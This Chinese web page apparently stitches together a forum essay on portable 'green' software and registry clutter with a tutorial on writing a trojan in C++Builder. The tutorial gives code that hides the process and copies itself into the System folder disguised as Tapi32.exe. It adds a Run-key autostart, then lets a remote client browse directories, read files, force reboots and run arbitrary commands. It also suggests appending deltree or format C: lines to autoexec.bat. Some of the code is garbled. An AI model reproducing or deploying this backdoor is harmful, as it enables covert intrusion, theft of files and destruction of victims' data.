VB.NET编写木马,c语言编写木马

小程序：扫一扫查出行
【扫一扫了解最新限行尾号】
复制小程序

如何用VB.net 写注册表

我来告诉大家什么是纯绿软件--（希望无知者不要再胡说八道了）

有人说：

还有哪些所谓写绿色软件的人是不懂windows编程，根本就写不出注册的过程。所以自我安慰的叫绿色软件。不知大家注意没有绿色软件是不可以在天加删除中删掉的。只要它运行就会产生很多拉圾，而且是到处乱放，这就是为什么容易出问题的原因所在。

我只能说，这样说话的人是个电脑肓。

或是根本不懂得绿色软件的含义。

绿色软件有如下严格特征：

1、不对注册表进行任何操作（或只进行非常少的，一般朋友能理解的操作，典型的是开机起动。少数也进行一些临时操作，一般在程序结束前会自动清除写入的信息）。

2、不对系统敏感区进行操作，一般包括系统起动区根目录、安装目录（windows目录）、程序目录（Program Files）、帐户专用目录。

3、不向非自身所在目录外的目录进行任何写操作。

4、因为程序运行本身不对除本身所在目录外的任何文件产生任何影响，所以，根本不存在安装和卸载问题。

5、程序的删除，只要把程序所在目录和对应的快捷方式删了就可以了（如果你手工在桌面或其它位置设了快捷方式），只要这样做了，程序就完全干净地从你的电脑里删去了，不留任何垃圾。

以上就是绿色软件的特征。

对于编程人员来说，做一个绿色软件不难，做一个非绿色软件也不难，但是为什么那么多软件不做成绿色的呢？下面作一些讲解：

一、大型软件公司的大型软件为什么不做成绿色的：

1、大型软件公司并非没有能力做出绿色软件，但它们的软件涉及的方面过多，需要对系统原有的一些设置进行改动，以使电脑按照软件设计要求进行操作。以PhotoShop为例，它就需要在注册表里添加很多种格式文件的默认打开方法为PhtoShop.exe，以便大家双击此类文件后就自动打开PhotoShop以便编辑。

2、为了更好的为一些对电脑知识不是很了解的朋友进行一些自动设定。还是以PhotoShop为例，这儿已经有朋友发布了解压即可用的，但是，还是不少的朋友，连解压也不会，解压后都不知道点哪个文件开始正常运行，也不知道怎么在桌面上建快捷方式。就算别人为他做完了上面的事，要是有一天，他不想要PhotoShop了，也不知道原来安装的程序在哪个目录，怎么删去，甚至不知道如何删除快捷方式，更别说如何完全干净的删除了。做成安装版就可以自动为使用者完成上面的事了。

（特别说明：上面对PhotoShop的举例，只是用它来举例罢了，其实网上流行的解压即可用的PhotoShop也不是严格的绿色软件，其运行还是会写注册表的，如果不正常的使用它，注册表里还是会留下垃圾的，不过，这种垃圾对你的电脑影响不是很大，会的朋友可以手动删除这些垃圾）

二、做成安装软件很难吗？那些所谓写绿色软件的人是不懂windows编程，根本就写不出注册的过程吗。

1、我只能说，某些人的这种说法是一种非常不负责任的说法。其人根本不懂得编程，可笑而幼稚，只能以电脑肓来称呼。

2、现在流行的各种编程软件分三大类：

A、第一类是微软出的编程软件。

有Visual Studio系列（流行版本为6.0）以及新出不是很久的VS.NET系列，它们都自带了安装发布功能。特别是Visual Studio中的VB做出的东西，如果不发布，或不进行相关的处理，在别的没有安装VB的机器上是根本运行不起来的，因为VB编译出来的程序在根本上是伪编译，其指令通过VB运行库转译后运行，没有VB运行库的机器是根本无法正常运行此类程序的。当然了，有经验的朋友可以手工把运行库复制入相应的目录中，或是和VB做出的程序放在一起。其它的Visual Studio做出的程序有的有类似的上述情况。

在微软出品的VS.NET中，VS.NET兼容了多种编程语言，但按其说法，最终的代码其根本实质会变成一致。但是它做出的也同样是伪代码，也就是说，其代码不是根本上的机器二进制代码，不对机器进行直接指令指示，而是向.NET运行环境（NET Framework接口）发出指令，而由NET Framework转译指令为机器代码，再进行持行。这就要求你的机器上安装了NET Framework。NET Framework在win95/win98/windows2000上默认是没有安装的，如要安装，需要从网上下载或其它方式得到后安装。（微软官方有下载，大家也可以使用windows updata得到）。XP、windows 2003已集成。最后要说的是，微软宣言，要将原来的API接口（windows一直使用的标准编程接口）作废，改用.NET接口，故.NET编程方式可能是将来的标准方式。VS.NET系列的软件也集成了通用安装发布软件，只要正确掌握它，就能很好的做出楼主所谓的安装程序。

B、第二类软件是大名鼎鼎的Borland公司出品的编程软件，它也包括两大系列。即API系列和.NET系列。其.Net系列的情况和VS.NET是类似的。而其API的情况就有些不同了。

Borland的Borland C++Builder和Borland Delphi是两种非常流行的针对win进行API编程的编程环境。他们也带有install shield，可以说是编程人员必学的。不过，很多的稍简单的程序，编制者并不用它，因为，使用Borland C++Builder/Delphi开发出来的程序，只要正确设定几个参数，编译后得出的程序就可以在几乎所有版本的win中很好的直接运行了，当前，前提是，没有使用有特殊要求的第三方控件，或某些必要特别设定的数据源（BDE等）。而且，稍熟练的编制者可以直接在程序中通过程序自行进行一些简单的环境设定，如写注册表（关联文件、开机起动）、利用资源文件的方式向重要的目录写入文件，注册组件等等，可以说一点儿也不难。

C、第三类是一些比较偏的编程语言了，如易语言等，使用的人很少，本人很老实的说，具体情况我也不是很了解。

三、为什么一些个人的简单的软件会做成非绿色的：

1、编写者水平太低。低到只会使用微软的VB等，虽然做出的东西也值得一用，但是不知道怎么把它变成绿色的，只能依*VB等本身的功能以保证程序的正常运行。

2、编写者懒，写出程序后想，只要程序能正常让别人用就可以了，不值得太费脑子，依*VB等本身的功能发布吧，反正这样保险。

3、编写者水平不低，也不懒，但是它的程序用到了一些第三方控件，这些控件需要发布安装才能正常运行（需要注册特定的.DLL，需要把一些文件放到特定的位置，如典型的，要放入windows下的system32目录中。）

4、编写者为一些水平实在太低的人考虑，为了那些人的方便，如典型的《笨笨钟》就是此类，《FoxMail》、《winamp》也是此类，当然，FoxMail、《winamp》是写注册表的，通过其主程序进行一些环境的设定，严格上来说，也不是纯绿的。

5、编写者有一些特定的，不想为人知的东西要放入你的机器。比如典型的《阿达连连看》就是这样，它要把一些特定的与注册相关的东西放入你的windows目录，而且不想被人发现。又如网际快车的某些版本，它要把广告程序代码放入你的windows安装目录。

6、编写者有恶意，它的程序其实捆绑了木马、病毒等（对这一类的就要非常小心了），在安装的过程中这些恶意的程序就会释放出在，不知不觉中潜入你的计算机。

四、是否可以做出功能复杂，但又是严格意义上的纯绿软件：

答案是非常肯定的，因为，其实我们正在使用的很多程序都是纯绿的，特别是很多的游戏，虽然它们也要安装后才能运行，其实，你把它们安装后的目录放在别的机器上也一样的可以使用，并不必再次安装，其安装的意义就是***编写者为一些水平实在太低的人考虑***，如《三角洲》、《魔兽争霸III》。特别如网络游戏《传奇》（这个程序写的是真的很经典了，决对纯绿）等等著名的游戏都是如此。其需要设定的环境记录可以不写在注册表内，而利用*.INI文件来记录。我不知道有几个人有胆子说编写这些程序的人水平低下。

五、综上所述：

1、要做出一个纯绿色的软件，并不是很难，当然，可能要求编制者更多的依*自已去写代码（在必要情况下），在程序涉及方面比较多的情况下，可能给编制者加重很多的工作量。而要做一个非纯绿的软件，那就更容易了，往往可以利用编写器的一些自带功能自动完成。

2、纯绿的不带安装功能的软件非常适合于对电脑比较熟悉的朋友使用，而绿色带安装的软件适合于所有人使用。而自以为对电脑很熟的朋友往往更喜欢不带安装功能就可以用的。原因有如下：带安装的软件往往会有反安装程序，如果安装目录被人为删去，反安装程序或一些相关注册表信息往会留在机器中，成为垃圾。

3、为了自已的机器的安全、快速，也为了知情权（一个程序到底在安装和使用过程中在自已的机器里写了什么），本人极力推荐纯绿的软件。即便在必要的情况下非纯绿，也希望有详细的说明。说明软件可能会写注册表的那些部分，会改动机器里的哪些文件，会向哪些目录写入什么文件，内容。而且，希望这成为软件界的一个标准。这样，我们的电脑才会有安全可言！

4、为什么现在流行的软件中真正纯绿的软件不是很多呢？这个问题很不好回答。在这儿可以非常遗憾的告诉大家，有些朋友在网上下载的winrar绿色版、winamp绿色版等等，都不是真正意义上的纯绿软件。

比如winrar，它就因为为了在鼠标右键上出winrar的功能菜单而写动了注册表，因为要关联比如扩展名为.rar等等的文件（这些都可以在winrar程序里设定和更改）而写动了注册表。如果使用winrar后，强行把winrar程序目录删去，注册表里的这一部分注册表信息必然成为垃圾（其它的也许有本人没有发现的动作，如没有说出来是本人水平不足的问题了，呵呵）。

winamp绿色版似乎要好一些（本人的感觉），如果你设定了一些文件的关联，如双击*.mp3等文件winamp就会自动打开播放的话，你强行删去winamp所在目录，这部分文件的关联信息也会成为垃圾留在注册表中。

（上面两个只是举例，解决办法很多对电脑熟悉的朋友是会的，在这儿，我们并不讨解决办法，另外，应该说，上面两程序是很规范的东西，它们的这些动作是无可厚非的）

现在再回过头来说说“流行的软件中真正纯绿的软件不是很多”。

A、有些功能是非通过写注册表来实现不可，最最常见的就是文件关联、鼠标右键菜单。（呵呵，这种操作可以说，稍熟编程的人都会）。但是很少有个人编写者考虑到别人不用他的程序时，要怎么让使用者方便地复位这些文件关联，方便地清理右键菜单。

B、部分程序编写者喜欢把注册信息放在注册表中。（为什么喜欢？就因为注册表是庞大的参数库，他们以为，要从这样一个大参数库找出他们写入的一个信息是大海捞针。事实上，的确很多朋友是难以找出来的，话又说回来，会者不难，难者不会，在这儿我也不细说了）

C、一些大公司的程序实在对系统有太多的改动，他们做好了安装和卸载工具，这些软件涉及了系统的方方面面，想简单的删除是很难的。典型的就如微软的Office等等。这些软件说实在的，别说你不老实的删除了，就是老实的卸载，有时也是很难成功的。最好的办法就是装上后就别卸把，把它看成是系统的一部分（不管你乐不乐意，呵呵）。（又及，这类程序也不是很少，这儿只举一例）。

D、只有那些其功能可以不涉及更改系统默认行为的软件才可能在真正意义上做到纯绿。（（也许我罗嗦了）系统默认行为包括“文件关联”，“右键菜单”，“控制面版”里的项目，真实或虚拟的硬件驱动以及其它我想不起来或是我也不知道的东西……）。当然了，还要编写者有真正的为使用者着想的精神，有较好的技术。

六、有部分并非纯绿的软件，伪装成纯绿的，在运行过程中向注册表写东西，向关键目录区写东西，甚至更改重要文件。这不是纯绿软件，只能说是伪纯绿。又及，很多网上流行的软件，号称纯绿版，实际上只是一些原版本经过稍许改进等，原软件并不设计为纯绿，在运行过程中还是会写注册表（甚至写关键win目录），也不是严格意义上的纯绿。反过来，也有部分其实是纯绿的软件，为了大家的方便，做成了安装发布式的。比如最典型的就是《传奇》《三角洲》、《魔兽争霸III》等一些游戏，一些工作软件如《FOXMAIL》(FoxMail至少在针对IE选项里的“程序”页里的"电子邮件"相关项进行了注册表相关写操作)《winamp》《winrar》等等准绿软件（在这儿，我只说它们是准绿的）也是如此。这类软件其实安装出来后，把其目录放在任何一台电脑上都能或者能较为正常的运行，这也是为什么大家能很方便的把它们改造成绿色软件的原因。现在真正的纯绿软件实际上是很少的，至于以后，也还是看不到纯绿一统天下的希望的，大家不可因噎废食。不可能只用纯绿软件而不用其它。而且大公司的软件一般还是非常可*的。

七、非纯绿软件的危害：

1、向系统关键目录或不属于该程序所在目录乱存放文件（默认临时文件夹除外）在原则上对机器的运行速度是没有大的影响的，除非乱放的文件改动了原有的系统关键文件，才会至使电脑变慢或运行不正常。但是，因为这些目录中的文件一般都比较多，很难对它们进行清理（鬼才知道哪个是能删，那个不能删），会使你的硬盘空间浪费，对于硬盘空间紧的朋友，那就非常讨厌了（此外，心里也不爽）。

2、向注册表乱写信息，如果乱写的信息并不影响系统的关键部分，对系统运行也是没有严重影响的，不过，有些信息写入了不删去，你的系统就会有些讨厌的东西出来，举例：你装上winrar后（典型安装设置），直接把winrar删了，你就会发现，你的右键菜单里会多出一些让人哭笑不得的东西。要注意的是，随着机器的使用，软件的安装、删除，这些可以感觉到和不能感觉到的信息会越来越多，而你的机器在运行过程中，几乎随时随刻不能离开对注册表的相关操作，注册表里的信息过多，机器查找所需信息的速度就会变慢，这时，机器的运行就表现为“变慢了”，这往往是一台电脑为什么越用越慢的最重要的原因之一。（提示：因为多数情况下，一个软件对注册表写的东西并不多，所以，在每一次垃圾进去了，用户是很难感觉到影响的）（又及，一些注册表清理软件，本人也用过，虽有作用，但是风险不少，是好是坏我也不知怎么评价……）。这些垃圾信息并非只有小公司的软件会留下，很多大公司的软件据本人的感觉，也是会留垃圾的，本人也很无耐。

解决办法吗？恕本人无能，在当今软件乱世，只怕多少有些无可耐何。本人是使用最笨的方法：Ghost镜像还原。基本上每三至四个月给它倒回一次。（工作文档等当然不能放在系统区了，呵呵）。

八、希望无知者不要信口开河，多多学习。最后，附上一个我自已做的纯绿软件---BCB编写的《水波特效演示》程序，给大家玩玩叭。

补充——初步判断一个软件是否纯绿软件的方法（注，只有对电脑比较熟悉的人能才办到，如果下面的说明，你基本能看懂，而无需请教别人，你就能做到了）：

一、系统测试法：

1、将软件在别人的机器上安装，安装完成后，把安装出来的目录复制到你的机器中（如果本身就号称纯绿免装的，这步就免了）。

2、你的机器要求安装windows2000 或 windows XP 或 windows2003，使用受限用户登录（要求受限用户无对关键注册表有写权，无对重要目录有写权，当然了，默认的新建的用户就是这样的（XP下要将用户设为受限））。

3、受限用户登录后运行复制来的安装目录下的软件的主程序，如果正常，90%是纯绿。

4、对省下10%的说明——不排除可能编写者隐了动作，如果不成功也不报错，也不退出，还正常运行，一但能写的时就它就写。另外，还有一部分程序，如FoxMail，只对当前帐户相关于注册表进行写操作，因为“帐户相关于注册表"是"属于"对应帐户的，在受限帐号下也是可写的（特别说明一下，注销该帐户，注册表中该帐户的所有项目都会清去，所以也可以算是绿的）。

二、软件监控法：

1、如果上面的步子还不令你放心，还有一个工具值得一用，那就是《Filemon》，这是一个可以监视系统中任何软件对硬盘的读写操作的程序，通过它，你可以查到某个程序对你的硬盘的什么位置的什么文件进行了操作，这个程序只能在管理员帐户下用（切入系统进程）。

2、对于注册表的监视是很麻烦的事，《Regmon》可以办到，同上面的工具一样Regmon要求在管理员帐户下用（切入系统进程）。

3、90%的软件和上面的两个软件无冲突，省下的9%的是作者有意防止被监视（为什么有意防止被监，那你就自个想吧，一般都是比较可怕的东西），最后1%可能是因为程序实在相互不兼容了。

以上两工具都为同一公司(Sysinternals)出品，值得一用，附在最后(XTJS.rar)。

三、并非所有的不能在受限帐户下用的程序都不是纯绿的。某些程序可能要切入别的系统程序中，某些程序需要得到硬件信息等，这些最只有在管理员帐户下才能实现。还有一些程序可能没有考虑多用户操作系统等。只能说，通过了上面的测试的程序90%是纯绿的，没有通过的话90%是非纯绿的。有经验的朋友还可以据自已的经验得到更准确的结论。参考资料：以上资料,从网上下载的,与本人无关

如何编写木马

木马是如何编写的（一）

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！呵呵，要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成??服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion();

// 得到操作系统的版本号

if (dwVersion = 0x80000000)

// 操作系统是Win9x，不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL);

file://卸载动态链接库

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

file://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH);

是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

file://定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

file://设置主键为HKEY_LOCAL_MACHINE

Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

{

file://如果以下语句发生异常，跳至catch，以避免程序崩溃

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

file://如果不是，就写入以上键值和内容

}

catch(...)

{

file://如果有错误，什么也不做

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://将第11个字符转换成integer型，存入file_name变量

file://为什么要取第11个字符，因为第10个字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://将两个目标文件的属性改为可读可写

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

file://定义计数器

while(fp==NULL)

{

file://如果指针是空

fp=fopen(filename,"a+");

file://如果文件不存在，创建之；如果存在，准备在其后添加

file://如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://跳至END处

}

fwrite(content,sizeof(char),strlen(content),fp);

file://写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

fclose(fp);

file://写完后关闭目标文件

Socket-SendText("Sucess");

file://然后发回“Success”的成功信息

}

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲?：

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if(Dir_Name=="")

{

file://如果目录名为空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打开目录出错

Socket-SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指针是NULL

fp=fopen(TempFile,"w+");

file://就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功（真有耐心！）

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

while ((ent = readdir(dir)) != NULL)

{

file://如果访问目标目录成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”，证明不是根目录

filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

file://加上“\”字符后将指针指向目录流

else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目录，则不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目标文件的访问属性

if (attrib FA_RDONLY)

file://“”字符是比较前后两个变量，如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp);

file://将目标文件属性设为只读

else

fwrite(" ",sizeof(char),3,fp);

file://失败则写入空格

if (attrib FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

file://将目标文件属性设为隐藏

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://将目标文件属性设为系统

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_DIREC)

fwrite(" DIR ",sizeof(char),9,fp);

file://将目标文件属性设为目录

else

fwrite(" ",sizeof(char),9,fp);

file://失败则写入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp);

file://写入换行

}

fclose(fp);

file://关闭文件

closedir(dir);

file://关闭目录

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打开Win369.bat准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

变量加上刚才的300个字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重复

};

Return_Text=Return_Text+temp_content;

变量加上刚才的300个字符

fclose(fp1);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text变量的内容

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4个字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://将目标文件流存入File_Name变量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打开目标文件准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已试了100次了

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的错误信息

goto END;

file://跳到END

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重复

};

Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

fclose(fp);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text的内容，即你查看文件的内容

}

咳咳！累死了！还是来点轻松的吧??操纵目标机的光驱（注意：mciSendString()函数的声明在mmsystem.h头文件中）：

{

else if(temp=="open")

{

file://如果收到的temp的内容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就弹出光驱的托盘

}

else if(temp=="close")

{

file://如果收到的temp的内容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交换鼠标左右键，简单吧？

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if(temp=="reboot")

{

file://如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系统的版本号

if (dwVersion 0x80000000)

{

file://操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

这个函数的作用是打开一个进程的访问令牌

函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

的作用是修改进程的权限

tkp.PrivilegeCount = 1;

file://赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

的作用是通知Windows NT修改本进程的权利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://强行退出WinNt并重启

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://强行退出Win9x并重启

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://写入换行符

fclose(fp);

file://关闭Win369.bat

system(TempFile);

file://执行Win369.bat

Socket-SendText("Success");

